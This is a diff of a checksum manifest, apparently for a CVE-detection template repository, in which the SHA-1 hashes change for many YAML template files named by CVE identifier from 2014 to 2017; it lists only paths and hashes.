-http/cves/2014/CVE-2014-2908.yaml:34b60804ce981f9c823e9e19caca4e269ba43c8f -http/cves/2014/CVE-2014-2962.yaml:3a364924dde5e4bd3e97684264d29dcd87e502c4 -http/cves/2014/CVE-2014-3120.yaml:f50d3f474c4bb0dbd656c57a48ba61e849486e8c +http/cves/2014/CVE-2014-1203.yaml:bc7a244f362f0b83439d56e3f0636e12843082e6 +http/cves/2014/CVE-2014-2321.yaml:94942212b37b470e8b83b342b8e460e1d10d631f +http/cves/2014/CVE-2014-2323.yaml:d86924b53ca183f55225f54739588683b7fd8b98 +http/cves/2014/CVE-2014-2383.yaml:d7ab3d6309e5ac9d06941842603e42cc5ac47e4d +http/cves/2014/CVE-2014-2908.yaml:d3abb494ed31a8fe1ba4417c33341523a40a8063 +http/cves/2014/CVE-2014-2962.yaml:53fac318582c4e243b9e5145fce965ed95428f90 +http/cves/2014/CVE-2014-3120.yaml:852e796db8a1ff729eac94d10d725c2d92ca47d7 http/cves/2014/CVE-2014-3206.yaml:782be59b3bb32def79865444317569a446583b0a http/cves/2014/CVE-2014-3704.yaml:96b8f5c3d29e4a07cad9c4d0ac5c3f601cf655f0 -http/cves/2014/CVE-2014-3744.yaml:e558b2c745e05e4c0025ceac2405b1252ab07d25 -http/cves/2014/CVE-2014-4210.yaml:1da5b0613ac1f2914cd717a6668459eaed6b923f +http/cves/2014/CVE-2014-3744.yaml:8fd97d3e288c8c134d50e3b670ef5c2ee23dd8df +http/cves/2014/CVE-2014-4210.yaml:4f7ce22b95de4f25135ce21ef24a481440fd3ff7 http/cves/2014/CVE-2014-4513.yaml:f773b0ae252939028612a224507f9815e8af7c49 http/cves/2014/CVE-2014-4535.yaml:5ea240904288e526982f8498a054c0f81060814b -http/cves/2014/CVE-2014-4536.yaml:9a419e33efcbea5baa4f8d653258be1a45b5ac76 -http/cves/2014/CVE-2014-4539.yaml:26b3d086f448e6808ff2d7cc1fcee23ff25dbb31 +http/cves/2014/CVE-2014-4536.yaml:c45991420328d9bcdbb3eaf2aea30726c7c162f8 +http/cves/2014/CVE-2014-4539.yaml:e4078f1d6f7af2ae149936f2a34e9ec6a7047313 http/cves/2014/CVE-2014-4544.yaml:9b348c6784b4e52f72f556420bdeebf266b0c266 http/cves/2014/CVE-2014-4550.yaml:d91b194e084d6abcb57601e52751f8de18ac94d4 -http/cves/2014/CVE-2014-4558.yaml:32ad362633e7f3c89c17684fa2f0add284cce52f -http/cves/2014/CVE-2014-4561.yaml:bb07a47af2690288b49fe39a07dcbda30fb71b2d +http/cves/2014/CVE-2014-4558.yaml:fa8f68a1865e8463aab7b7648d00939186f6d6b2 +http/cves/2014/CVE-2014-4561.yaml:510ee96cb131f1235bcaaed0e70a67fecec141ce http/cves/2014/CVE-2014-4592.yaml:04d3f44b089e28ea1d584bead8b557aee3d12f63 -http/cves/2014/CVE-2014-4940.yaml:6f2d09cfc92e6e1f5624fa66305e6aef9b93c22e +http/cves/2014/CVE-2014-4940.yaml:136ffe1784b6c7bb206c326d2652dcdcaef7552f http/cves/2014/CVE-2014-4942.yaml:ca31e2efcd6b8e2593546a1951f70b3a0291d9b6 http/cves/2014/CVE-2014-5111.yaml:41b3e9480d86bc114cc55c99a0fbcc65563b6616 -http/cves/2014/CVE-2014-5258.yaml:b4097cdbe58cf74d91b4a7249119cb46a186d3d9 +http/cves/2014/CVE-2014-5258.yaml:b25628942848bdd5962b6a5c9e52af5930597f67 http/cves/2014/CVE-2014-5368.yaml:a164c0d868655690541a180330c2ee48979fff2f -http/cves/2014/CVE-2014-6271.yaml:91fe47f1efff2e7850a3a9c8408dcaea4b7fcfa1 -http/cves/2014/CVE-2014-6287.yaml:50e85a0a80464d40fe58430414e03d67b11fce10 +http/cves/2014/CVE-2014-6271.yaml:c336b5b85934da1f43ce4d185e09796b4fd70e4e +http/cves/2014/CVE-2014-6287.yaml:3c4729bdae68ac1479d19f6720fffddbb26d262f http/cves/2014/CVE-2014-6308.yaml:aa88544552c7b66b74ede5bf9e0b134edbf863fa -http/cves/2014/CVE-2014-8676.yaml:72239c99e43a574291bd68fbbd57a06dd9a48555 -http/cves/2014/CVE-2014-8682.yaml:e1307f41692edd23e6751e01190e7cf2dcc6346d -http/cves/2014/CVE-2014-8799.yaml:55e4235f8b2c2d12d78d809d1a9233f6d3049952 +http/cves/2014/CVE-2014-8676.yaml:0cfe4b8a24bcb2b98dd9549cb2d1c39585200dd2 +http/cves/2014/CVE-2014-8682.yaml:dc6b4228d0435ef2d1a27f769cc058c103c914d2 +http/cves/2014/CVE-2014-8799.yaml:e2899a7c8ca8196f7138c225e30af40dbef8fd05 http/cves/2014/CVE-2014-9094.yaml:13aebc2fd2c559c5ee127d7c8ddc0dbb681c84fd http/cves/2014/CVE-2014-9119.yaml:f1cd0ce2c6014b22a0cf943c0ea4a3d58fc147e6 -http/cves/2014/CVE-2014-9180.yaml:15dcee27c96bb39f779c55321c7d133b3a4a11f8 -http/cves/2014/CVE-2014-9444.yaml:8c4ab8aa355b6feda6e04a50176a12666a8e1a66 -http/cves/2014/CVE-2014-9606.yaml:74cc1154e0374f962b3962f9f1ae08cacd632aff -http/cves/2014/CVE-2014-9607.yaml:bae4ee40ea38adab99256ff8810f842a528a02a4 -http/cves/2014/CVE-2014-9608.yaml:a3dffef6553a16a35bd4080bb9c255a1c6dfbeb3 +http/cves/2014/CVE-2014-9180.yaml:9efe6be2df197e7bc5265ad0eaf75f897a69f63a +http/cves/2014/CVE-2014-9444.yaml:f33dc2ffea4e7307bfd997daad8cd6bccc82d266 +http/cves/2014/CVE-2014-9606.yaml:b85356b15dad93b20df3cc8884e727d57733b88c +http/cves/2014/CVE-2014-9607.yaml:bfc63136609830a20e576b4a70729a9706e1c841 +http/cves/2014/CVE-2014-9608.yaml:fe1ccade7e14225244050e5e08033f7968d697a9 http/cves/2014/CVE-2014-9609.yaml:d421d78b1f69c9f53e2a166d11e80fc8e317204e -http/cves/2014/CVE-2014-9614.yaml:01bdb613d35cf22722197f354d046532e5bc41f7 +http/cves/2014/CVE-2014-9614.yaml:beedd24fb47f14bb6523002f382ad4660a4aff85 http/cves/2014/CVE-2014-9615.yaml:59a97a7e4a3fc7fa230940a4601b02da8b69371b -http/cves/2014/CVE-2014-9617.yaml:acb0b5cab66249f9b07c789cca09d8c1d51488ce -http/cves/2014/CVE-2014-9618.yaml:fbf5a3a378ae96a0f1ebcd2980f3113549c3af6a +http/cves/2014/CVE-2014-9617.yaml:bb4955ef8e4d44b240c4a02c58859327b0cac78e +http/cves/2014/CVE-2014-9618.yaml:608a6fb69d382c773377b69b638a29047c58f77b http/cves/2015/CVE-2015-0554.yaml:d20883db51faac8ddf1fcf4709e557d1967c7485 -http/cves/2015/CVE-2015-1000005.yaml:148ee1bcb93fa4293b5027a83c6cdf252851511b +http/cves/2015/CVE-2015-1000005.yaml:6bbb08fc5f35845e1796eec9f53f682f39a0b7d1 http/cves/2015/CVE-2015-1000010.yaml:080f04e2df67eb050ba392f3bf8ef27a87abdd05 http/cves/2015/CVE-2015-1000012.yaml:c4d338e114a302fa98bf87eb0a3e1255419d74eb -http/cves/2015/CVE-2015-1427.yaml:2052c433e8cec1bcba0a0c0ab79cae38f82b611d -http/cves/2015/CVE-2015-1503.yaml:505b6ad4223db51a89a64d57d71ea57f610162b9 -http/cves/2015/CVE-2015-1579.yaml:79d36985380867eb86b8493525f4df9c4823b2d9 -http/cves/2015/CVE-2015-1635.yaml:7e86c46c0d912d6b56ce0ca101290f9968b7e2be -http/cves/2015/CVE-2015-1880.yaml:bb7698568401bd95647404819705e35b1e7b9c8e +http/cves/2015/CVE-2015-1427.yaml:2cceec2e205f316b1fc790135f3c66b11075118d +http/cves/2015/CVE-2015-1503.yaml:bc85d23c04ac419bcbe58da76af9d044a52dcfd4 +http/cves/2015/CVE-2015-1579.yaml:52b616d917b5e92f3ab3b1732938e62af4957557 +http/cves/2015/CVE-2015-1635.yaml:791a7cf31afd4b27a3585149cfaadbdc1e953860 +http/cves/2015/CVE-2015-1880.yaml:9def22edba12734986460f999e854217643e7880 http/cves/2015/CVE-2015-20067.yaml:77e222d17ecb3663400b5bb143f2ab56845043b2 http/cves/2015/CVE-2015-2067.yaml:2835680c4edd735249eefa325c2ab2af801136d4 -http/cves/2015/CVE-2015-2068.yaml:c953242135a61e88df9918d88a563f12a78f7a44 -http/cves/2015/CVE-2015-2080.yaml:c8c1355c24f22a98ecd07ff45b5639045ebbf4c9 -http/cves/2015/CVE-2015-2166.yaml:44a883aee08d308103ab096e203af4147fb63c11 -http/cves/2015/CVE-2015-2196.yaml:978724dc54bb9ae4f534a373d87a67d4538e6858 -http/cves/2015/CVE-2015-2755.yaml:82a0a885cb854fa843400aae700b6189febf8341 +http/cves/2015/CVE-2015-2068.yaml:ddfed860ffa4852c598513ec68a14893b264a396 +http/cves/2015/CVE-2015-2080.yaml:b232c65718854a1049244802081c696ecc31eb82 +http/cves/2015/CVE-2015-2166.yaml:2869726e68902758b097a2b7f02925968ef0aeff +http/cves/2015/CVE-2015-2196.yaml:bd31271f82bc747db7d750a1d9890ed09c4192d3 +http/cves/2015/CVE-2015-2755.yaml:ac90343bbd36f1d7328d675ac69317f3ae2a46bd http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 -http/cves/2015/CVE-2015-2807.yaml:a227602f43f63d8af4f98cfaf7357fc6d357224c +http/cves/2015/CVE-2015-2807.yaml:459c579131720fd9cdda80c3d0ef2224c6666b35 http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f -http/cves/2015/CVE-2015-2996.yaml:4301c965d3ce4ee88948b11567c53f0c1f649fc3 -http/cves/2015/CVE-2015-3035.yaml:2ff6416b34c58d2f32282653c0b7b5ae4046814f -http/cves/2015/CVE-2015-3224.yaml:313678c50c664b17121e54cff7095002c666217f -http/cves/2015/CVE-2015-3337.yaml:b2ad45e3260bfa0a8120a1f1c0395d06faae88b4 +http/cves/2015/CVE-2015-2996.yaml:24c0c2213add5edba15d035eb9690636f24e3999 +http/cves/2015/CVE-2015-3035.yaml:b4346900d07331df73e331062ff50d71b17b221c +http/cves/2015/CVE-2015-3224.yaml:f1b418ea3923fe6ce83982865ea6a8f4196b23fe +http/cves/2015/CVE-2015-3337.yaml:5abe6c220d4892bc6f3f8839836a7696bc2a3c82 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 http/cves/2015/CVE-2015-3897.yaml:7e151eb750e3c1602ea9cb1aa3e9a2d68ca31770 -http/cves/2015/CVE-2015-4050.yaml:1fb6c88775ea0bb6994b2e298ee5c8b73719e3c3 -http/cves/2015/CVE-2015-4062.yaml:378f403ff95aa7bee5c65579e5d754b97e63e3e7 +http/cves/2015/CVE-2015-4050.yaml:902a93dcdb63a21b6683515c0e1ddf513ce5ddc4 +http/cves/2015/CVE-2015-4062.yaml:8c16e8680fcb2c9c9a9cea48e3dfac365c09fdcd http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750 -http/cves/2015/CVE-2015-4074.yaml:b5d68e8c21d90b492949a026199011ffa9b7ccb4 -http/cves/2015/CVE-2015-4127.yaml:07a76d863355591fa4bf3161356ac8edebe9ca97 +http/cves/2015/CVE-2015-4074.yaml:3c847a80227020cd12b9d58def71f335ed1ef5d1 +http/cves/2015/CVE-2015-4127.yaml:7a03956081adf3e4490a32ad4fbb5cba1dab766f http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd -http/cves/2015/CVE-2015-4455.yaml:891c495387a931870d0ceec861fc320c8b076967 -http/cves/2015/CVE-2015-4632.yaml:834457ecf87f6fbc2957118f24eab2f08a922f39 -http/cves/2015/CVE-2015-4666.yaml:d75fda264bca4227d5bed4d82da1aaf9a958c8ae -http/cves/2015/CVE-2015-4668.yaml:a7fd56350c28d37828eb15704a45a4b5d57bf11b -http/cves/2015/CVE-2015-4694.yaml:c66194043edff2b0b26162c69fb40f5245877588 +http/cves/2015/CVE-2015-4455.yaml:a763c5deb0c742232e489d143dd154c0ea2b4fa0 +http/cves/2015/CVE-2015-4632.yaml:8b2f1aa45ef9876de13f529f40b0ad7698ab1dc8 +http/cves/2015/CVE-2015-4666.yaml:4ce784f10bfa966a6f5ecf859b9a80850a6c2aae +http/cves/2015/CVE-2015-4668.yaml:7b1b38f3c97bb09484a822df734f429e136deed9 +http/cves/2015/CVE-2015-4694.yaml:fb0332f2f71695e7eaea56de97197ef7924b5fcc http/cves/2015/CVE-2015-5354.yaml:628f69500fd63d21bb4637dcb719434c1f5aa353 -http/cves/2015/CVE-2015-5461.yaml:98d8eb40f34b8c6d6d603dd8078a68d86a896f90 +http/cves/2015/CVE-2015-5461.yaml:ccdf5da24f86d86ab0916171941d351a5ebcc120 http/cves/2015/CVE-2015-5469.yaml:993b7db9108784f0a7abb12ef8b33c5d5c1cc68e -http/cves/2015/CVE-2015-5471.yaml:f73d747097f7021c3ea779182d4317198dfadbbd -http/cves/2015/CVE-2015-5531.yaml:f860f8459f55bfea5bf44d5317a66012a44970dc -http/cves/2015/CVE-2015-5688.yaml:dfdad41c83a97739b7002798c9614018919b5c4f +http/cves/2015/CVE-2015-5471.yaml:b4ab394eb025425254e020ef76d91a62d84c88af +http/cves/2015/CVE-2015-5531.yaml:7298c9d71d9bfe34269c16623a7676de7fc6fd09 +http/cves/2015/CVE-2015-5688.yaml:b4a080196c1edcc203a9c220392daaa98837e7ed http/cves/2015/CVE-2015-6477.yaml:9255a94059eced9c3b57520ad58ac346f15c8d2b http/cves/2015/CVE-2015-6544.yaml:b3e7f972c791e433d02747d3a2f15e2b93dd5128 http/cves/2015/CVE-2015-6920.yaml:010bca7f3c3d63174ad513216c778c12be764930 -http/cves/2015/CVE-2015-7245.yaml:d7c4caa6aebd858813b48f504170ead93f76c97e -http/cves/2015/CVE-2015-7297.yaml:479397b821556af05d4883e6dec21032e5fa5c7b -http/cves/2015/CVE-2015-7377.yaml:056f3a75cc766de47884ee47bc3475d52de4c5dc -http/cves/2015/CVE-2015-7450.yaml:6fa68acdf9f9b816bc885ea187a929c5f0e1f201 -http/cves/2015/CVE-2015-7780.yaml:158102b86a2ba04cff932be068374b3aa67377c4 -http/cves/2015/CVE-2015-7823.yaml:419b139acb8649df87f9fbdd151b5a4a23674e2f +http/cves/2015/CVE-2015-7245.yaml:f5ff558dc2e6aaf7c6fddea351eef15b0fc314b0 +http/cves/2015/CVE-2015-7297.yaml:cba00035af3c1fdb376e38b8f87019b2d7c0b9f6 +http/cves/2015/CVE-2015-7377.yaml:91d20f0b6f6c80a103811c9c813ae2d8c9c6f766 +http/cves/2015/CVE-2015-7450.yaml:d31f750f627aa509eb258c5cfa04016818a1aba6 +http/cves/2015/CVE-2015-7780.yaml:19bbe0743719cd540cad1b1410f9530780893a6f +http/cves/2015/CVE-2015-7823.yaml:1d3cfb653a6a3c4f3215e29c1fa33b7ec523c5a6 http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 http/cves/2015/CVE-2015-8399.yaml:88082e1686fa05ae008feb2f2d6a0eeba15d8696 -http/cves/2015/CVE-2015-8813.yaml:7c2d2a8feb91d0c4eb7f5133a631276db24e318a -http/cves/2015/CVE-2015-9312.yaml:19fbaca553a825f2ff06036d499b163f79994c04 -http/cves/2015/CVE-2015-9323.yaml:e764a97924ed55cb99181149860192850ef709e2 +http/cves/2015/CVE-2015-8813.yaml:6871ac55ac5ff533b2f5d8965baf1eefee256f9f +http/cves/2015/CVE-2015-9312.yaml:7cc0a19a624945d3fde03ebd0ba95c2c6e3c9410 +http/cves/2015/CVE-2015-9323.yaml:35c614423d01772c2c72b1287a264bb350109ecc http/cves/2015/CVE-2015-9414.yaml:44f53443a463d463c575726eec3ff5192b2bcb27 -http/cves/2015/CVE-2015-9480.yaml:76d467ff7bdd50d5b4b0c6eb8735888258d83aec -http/cves/2016/CVE-2016-0957.yaml:6a4aceb98204ef9b710851d91fde84365704e013 -http/cves/2016/CVE-2016-1000126.yaml:77ea357d95ad88637f6db5ead04573a8af9dcbaf -http/cves/2016/CVE-2016-1000127.yaml:5d4c49411b8f59c68c53286b173ebec38363dbbc +http/cves/2015/CVE-2015-9480.yaml:70993e12643bcf8303d221fa8475aff4a9c0c1de +http/cves/2016/CVE-2016-0957.yaml:2e39ae03a9d122b13acb44740c3f74563d68e089 +http/cves/2016/CVE-2016-1000126.yaml:d820a62f82342e8c68f0b56000bcfb1d3ee196ff +http/cves/2016/CVE-2016-1000127.yaml:79570d7e9d206139992c889d1f314c8cd58b437a http/cves/2016/CVE-2016-1000128.yaml:42f74b0e57adf59effe7e114152a36202d61eb6c http/cves/2016/CVE-2016-1000129.yaml:6a9354109374ffdb6807cff25eb83aaebb9e58a2 http/cves/2016/CVE-2016-1000130.yaml:1f43e1aba00fb7e7bb30af51d831b340e5ab6ba2 -http/cves/2016/CVE-2016-1000131.yaml:3308d2f197f8ef3f8f816b639c48c668ab67ea58 +http/cves/2016/CVE-2016-1000131.yaml:f447ecc5dc9268216d688e5bb54dc08e9821e892 http/cves/2016/CVE-2016-1000132.yaml:cbe226168be37f3644a070a0dd06f39419676b95 -http/cves/2016/CVE-2016-1000133.yaml:543a1628eed4a70ef1bda756d2a452e184632e0a +http/cves/2016/CVE-2016-1000133.yaml:781637a2b99455aaa3cef306979240fa8d66faed http/cves/2016/CVE-2016-1000134.yaml:09dbf84e0e4ddff69119ae612f2cdf3f21c7675f http/cves/2016/CVE-2016-1000135.yaml:5984d6af6ad7e94cd4dcf61907054f9dfd449c96 http/cves/2016/CVE-2016-1000136.yaml:5ee948fb4f7e2df7f4acf3e1ffdf28e9dfaf5322 -http/cves/2016/CVE-2016-1000137.yaml:7992a62d8b0a760dc2745ea2d4bdcff8a8c63dd7 -http/cves/2016/CVE-2016-1000138.yaml:ef4e7b323056e6d946ca47ef4c1a2e2b727d1ab0 +http/cves/2016/CVE-2016-1000137.yaml:2e2b998b96166d5bcab21989bd157ce566053d0b +http/cves/2016/CVE-2016-1000138.yaml:b3d7023d5fec09ee08535602972a17fff99e7767 http/cves/2016/CVE-2016-1000139.yaml:8b0948303469e93387ad15ba7c7d26ddd0864b29 http/cves/2016/CVE-2016-1000140.yaml:824295a403f50be40c0442f34403855e9a1d472b -http/cves/2016/CVE-2016-1000141.yaml:7dedcea1a8ad3f4b2f71389036404f164c088465 -http/cves/2016/CVE-2016-1000142.yaml:299e7a60c352c0d7ea4f9a6d75d436f15aab1c13 +http/cves/2016/CVE-2016-1000141.yaml:685f6855bd21008a3b9a651a785a986d1e4226a9 +http/cves/2016/CVE-2016-1000142.yaml:b8a04a9d4af50f122b340fdfed9235b0186960df http/cves/2016/CVE-2016-1000143.yaml:27bb71d021209094b538c07f4f52733dbc941fbd http/cves/2016/CVE-2016-1000146.yaml:0f4feb40b92ac6e9e336bc76a07d46ff7071f845 -http/cves/2016/CVE-2016-1000148.yaml:25ba12031468a02dba3afd1911f23c94572dc39e -http/cves/2016/CVE-2016-1000149.yaml:86bc42b8ccb0e878805966b9cbe4a0d876d7f77b +http/cves/2016/CVE-2016-1000148.yaml:b2a8951e2d3e0eb40a2e5cceb0ad8f3693231a47 +http/cves/2016/CVE-2016-1000149.yaml:b823989eee6c8387d73e2612cd6c66d34822f8d9 http/cves/2016/CVE-2016-1000152.yaml:d94328828fbf18aba5ef94afb0bd4df113377769 http/cves/2016/CVE-2016-1000153.yaml:918980710b38127ac9e1da9cdeb7424b9ee7b74f -http/cves/2016/CVE-2016-1000154.yaml:7a051fc4ae2373f86ad53f6abdda4d7096fdf62e -http/cves/2016/CVE-2016-1000155.yaml:647dfeeec99b332ef140771291662d1cbe99286a -http/cves/2016/CVE-2016-10033.yaml:232d83356ff34a267485bcb25a7dbf545fce3e88 -http/cves/2016/CVE-2016-10108.yaml:fec37410b6b632419f59b6c386bf2ad37db2282c -http/cves/2016/CVE-2016-10134.yaml:cb89300fac923d957bf6f61202f8fdc1159d643a -http/cves/2016/CVE-2016-10367.yaml:7e0f439a28a7d9e0294a6752135175a00d4df520 -http/cves/2016/CVE-2016-10368.yaml:f7e31f13e4b1e7d3e9e714d3333462629b0a0e35 -http/cves/2016/CVE-2016-10924.yaml:f0f8949f73e892e9f269db834c2b6872c15f5a07 +http/cves/2016/CVE-2016-1000154.yaml:9f5e685ba1c82c03aa4ed980453f43ac1cb764a0 +http/cves/2016/CVE-2016-1000155.yaml:66e029ab0a6d4162a214f753b05749ac684570b3 +http/cves/2016/CVE-2016-10033.yaml:46d3745bada72633018639374e9274917e64c42c +http/cves/2016/CVE-2016-10108.yaml:d294a26723fb6dd081c30acc03ecfdfe3ebaeace +http/cves/2016/CVE-2016-10134.yaml:cd8be7b6b0f67be8cb711fac99045e3498296317 +http/cves/2016/CVE-2016-10367.yaml:f88f3b6e7d95ec3ef277bdb9602bf4d1f1c056ab +http/cves/2016/CVE-2016-10368.yaml:18a03211359f0c24af9c4b6160d1c0ef2b2215d4 +http/cves/2016/CVE-2016-10924.yaml:09bb7f7b66f894172c675bb3d36ef59589aa88c1 http/cves/2016/CVE-2016-10940.yaml:180cd258d3c386e8bba06f4d17e019d36486d58f -http/cves/2016/CVE-2016-10956.yaml:3c167a0e9cca4b786fda517c6bc7668cee4141db +http/cves/2016/CVE-2016-10956.yaml:6fd083b2e80dd090fececf6794043d2a136eaadd http/cves/2016/CVE-2016-10960.yaml:b712cb8e00ee7b482822de5367d1981a182200d6 -http/cves/2016/CVE-2016-10973.yaml:436451c68c9ddcd9b94a26278477ae2c41a1d880 -http/cves/2016/CVE-2016-10993.yaml:9bdd195c57b0946d4ed5c3df87dfd5837de8a22c -http/cves/2016/CVE-2016-1555.yaml:6b3e893a1320115b0e18d785105a0f7d5775d683 -http/cves/2016/CVE-2016-2389.yaml:928ce62f5f7913e63131cdb7484fc7b35ab40f9e -http/cves/2016/CVE-2016-3081.yaml:1085462cce049c99ca76f547b4599989a14efc98 -http/cves/2016/CVE-2016-3088.yaml:f91d8ac41e4432028cfbede6964661454e2331ff -http/cves/2016/CVE-2016-3978.yaml:b59e9ed3e4c91df88b86bb456095ec9ed543d290 +http/cves/2016/CVE-2016-10973.yaml:5607fa845f3c04fce8d349a6bce10be3bc9fd814 +http/cves/2016/CVE-2016-10993.yaml:7c95f86a87dba06de19b0c7c9974dacb82e09dee +http/cves/2016/CVE-2016-1555.yaml:43cc763cb62fa934d7686f2ae4177a663ce52599 +http/cves/2016/CVE-2016-2389.yaml:e68d84e200ee7ff552bde70a22a6ee13d2b7e3ff +http/cves/2016/CVE-2016-3081.yaml:325162185e24455dad06d62debd2587b4a1ef985 +http/cves/2016/CVE-2016-3088.yaml:10f622b6bcf9495bdbdfb8ad8094212ca42ade19 +http/cves/2016/CVE-2016-3978.yaml:50194a7bb856d34897330f6abfb36130e4d3296f http/cves/2016/CVE-2016-4437.yaml:4d774c5cc985a117d6a2214f892423f5c636d32e -http/cves/2016/CVE-2016-4975.yaml:98681241e1d9f4db62b42820bba949ed2f152e2b +http/cves/2016/CVE-2016-4975.yaml:628966f69a92b4056fdaf6c7fce5828958631dd5 http/cves/2016/CVE-2016-4977.yaml:ee48ddeac3b6d5461bc8980481e880af947436db http/cves/2016/CVE-2016-5649.yaml:beebd1faee4723faa26e1f0fe5a73e59628c2cfa -http/cves/2016/CVE-2016-5674.yaml:05184cce04ffa241bc304b0f242daaec7107280a -http/cves/2016/CVE-2016-6195.yaml:108d4b0cb54ea491a3c8e177bc56a13f8162dfbb +http/cves/2016/CVE-2016-5674.yaml:d0634ea9f19d47d72147befa933456f64520f566 +http/cves/2016/CVE-2016-6195.yaml:77519659bb0d9bbe21181153fe3dbb89ad7d99f9 http/cves/2016/CVE-2016-6277.yaml:c93b89da0c42f6e280440504cb3dd67c981a8d17 http/cves/2016/CVE-2016-6601.yaml:afa3f46e2bae4d3e90c1f403147d3e8a5b7d5739 -http/cves/2016/CVE-2016-7552.yaml:b8c439538226b5eca13f4e80bf74f0ac0cd45749 +http/cves/2016/CVE-2016-7552.yaml:39fc5904a9dca99e15f19f2436b6b431b73c0446 http/cves/2016/CVE-2016-7834.yaml:11e35334c12e72dab14682a71d851436eb898e8e -http/cves/2016/CVE-2016-7981.yaml:948a6727c2a8d4385c276e5d1e567cf6938371cd -http/cves/2016/CVE-2016-8527.yaml:de4d4d55ae233f9d0cc2cccf2527eaa43f2404fe -http/cves/2017/CVE-2017-0929.yaml:689211627cec05f38e3139c3f39271bd9542eb43 -http/cves/2017/CVE-2017-1000028.yaml:80cbf906dcacf0ba374dcacaec27b5e8b36e01df -http/cves/2017/CVE-2017-1000029.yaml:876ec94e59e9130cb5d34ff5c4a1e620251c37b0 +http/cves/2016/CVE-2016-7981.yaml:a2e0b9e42c515b9502621de3a809739bdb990538 +http/cves/2016/CVE-2016-8527.yaml:0dc95f94bd9750d11ae4886a5e0c6b15d70b065e +http/cves/2017/CVE-2017-0929.yaml:0d7a93b1f9d88b35c44d9f9ca56eccc62f865358 +http/cves/2017/CVE-2017-1000028.yaml:2ff0a301c6342c6a2c19b297accdecc6d48d8b78 +http/cves/2017/CVE-2017-1000029.yaml:a846ff1d51506f78c2b94e8a563c997d15532a7a http/cves/2017/CVE-2017-1000163.yaml:0c603eb787ab15dd4f944ea5b87b78f4af11afb8 http/cves/2017/CVE-2017-1000170.yaml:7ba7587d2b35dc762634a2c9490ca0bdea3fda51 http/cves/2017/CVE-2017-1000486.yaml:5345b553ebe658749c5016c21fc17f4e7fdc12aa -http/cves/2017/CVE-2017-10075.yaml:4bfbacc8e70549ff7a5b7f9e8ab3cca9f0f0948d -http/cves/2017/CVE-2017-10271.yaml:9b29a0d9242daab5c40fe8271718a8de9207e06e +http/cves/2017/CVE-2017-10075.yaml:ea4df8e06524ec92943b5b1d10920d92f190aa72 +http/cves/2017/CVE-2017-10271.yaml:c4d6d49ab294a59ba606325b0acabdc7be08bbae http/cves/2017/CVE-2017-10974.yaml:b0ae2bfd11149aecfa26d8faa954a8f8292f171c -http/cves/2017/CVE-2017-11165.yaml:335f7c179dccc3c2ea100da30d83ef0a2fca00d6 -http/cves/2017/CVE-2017-11444.yaml:a388e3b68002ab31cb33b61d088534f8d1b273a4 -http/cves/2017/CVE-2017-11512.yaml:551d25f72869af07044971e06d7c9aef09a9eeae +http/cves/2017/CVE-2017-11165.yaml:4abee409b33591001d45b096b6831499a91d3bcb +http/cves/2017/CVE-2017-11444.yaml:e1fedcc6cdc98248426ca0fb2352f1cd3861e2a9 +http/cves/2017/CVE-2017-11512.yaml:1cfc04d6428e8e76fbb3feb437ebde04e509a684 http/cves/2017/CVE-2017-11586.yaml:cb58394e00a6e06966ba607d6a4ebca3ac268972 -http/cves/2017/CVE-2017-11610.yaml:ad211be750982c1ef4165048da870fb2e789c67b +http/cves/2017/CVE-2017-11610.yaml:eba5c87798e309ab7c2ed89224a3a97f1c95df53 http/cves/2017/CVE-2017-11629.yaml:fc84633073745770603d19a552733beea2ac9779 -http/cves/2017/CVE-2017-12138.yaml:676cfe5f8f65f4ed3f4cf5846ba3b05c28e13e41 -http/cves/2017/CVE-2017-12149.yaml:5cfca7ee5636a93632aeb615f1d427aee75013cd +http/cves/2017/CVE-2017-12138.yaml:a1554be248c76a1249afeb83ac82a58f34e20390 +http/cves/2017/CVE-2017-12149.yaml:8e2fbc198b479812329b84de8a428699bcd1d2d8 http/cves/2017/CVE-2017-12542.yaml:0f4e30ef500ff64da2e8c5eca028a1dd35a44f6c -http/cves/2017/CVE-2017-12544.yaml:c4eae0c6efa6c3fc9ded84cc1e4624951ba966f9 -http/cves/2017/CVE-2017-12583.yaml:4b305b31b1330fdb1c24ec5787f57c060a42c11c -http/cves/2017/CVE-2017-12611.yaml:72658b1e16883bf8fe5ab1b8a0357e7c1518df56 -http/cves/2017/CVE-2017-12615.yaml:c912d36a03fb120bd0925b58561dbae629d345b5 -http/cves/2017/CVE-2017-12617.yaml:d92e32ab1c635908b9f63c99eedbc85476df017b -http/cves/2017/CVE-2017-12629.yaml:1b9b31ff6170297ba3b4f6fce3f0fd545c3f0a5d -http/cves/2017/CVE-2017-12635.yaml:db4eebc97e2ae1fa1558cdde2bf1123b319959c1 -http/cves/2017/CVE-2017-12637.yaml:f6a1b763290d992add7cf068d6051031c21f47b1 -http/cves/2017/CVE-2017-12794.yaml:4fe35ab1aaf9361761a37580d0c94f1bb8962c29 -http/cves/2017/CVE-2017-14135.yaml:fd02174fcd39ebd97a8ac4f34b6318d407d31e96 -http/cves/2017/CVE-2017-14186.yaml:e696378be2d403a776827e81a021a037942ef508 -http/cves/2017/CVE-2017-14524.yaml:eb53f561b7702df075913dd2c473245064faf3c0 -http/cves/2017/CVE-2017-14535.yaml:d6d786c498806e7d3fece3f2b9f853bdab962254 +http/cves/2017/CVE-2017-12544.yaml:07292848eebcdfadb01f7e946fb853685a612de5 +http/cves/2017/CVE-2017-12583.yaml:b819605bd22e17173142db5497ef7649bb5f83eb +http/cves/2017/CVE-2017-12611.yaml:1993c3d7c28326bc0c5701c84dcdbbe8777de6be +http/cves/2017/CVE-2017-12615.yaml:40f7f4d617668238e645d70888cab907c4bb687d +http/cves/2017/CVE-2017-12617.yaml:da64d230dee94b884c7e8384e9ebf7bfedc9c424 +http/cves/2017/CVE-2017-12629.yaml:c257f7eeaf409d969825d8298387c2300ed7adf4 +http/cves/2017/CVE-2017-12635.yaml:89903a430387c5ce7c178df83444800fc326c22c +http/cves/2017/CVE-2017-12637.yaml:1b6bd16d62ac6f72abebffaa4f9f9dc32e52cb3b 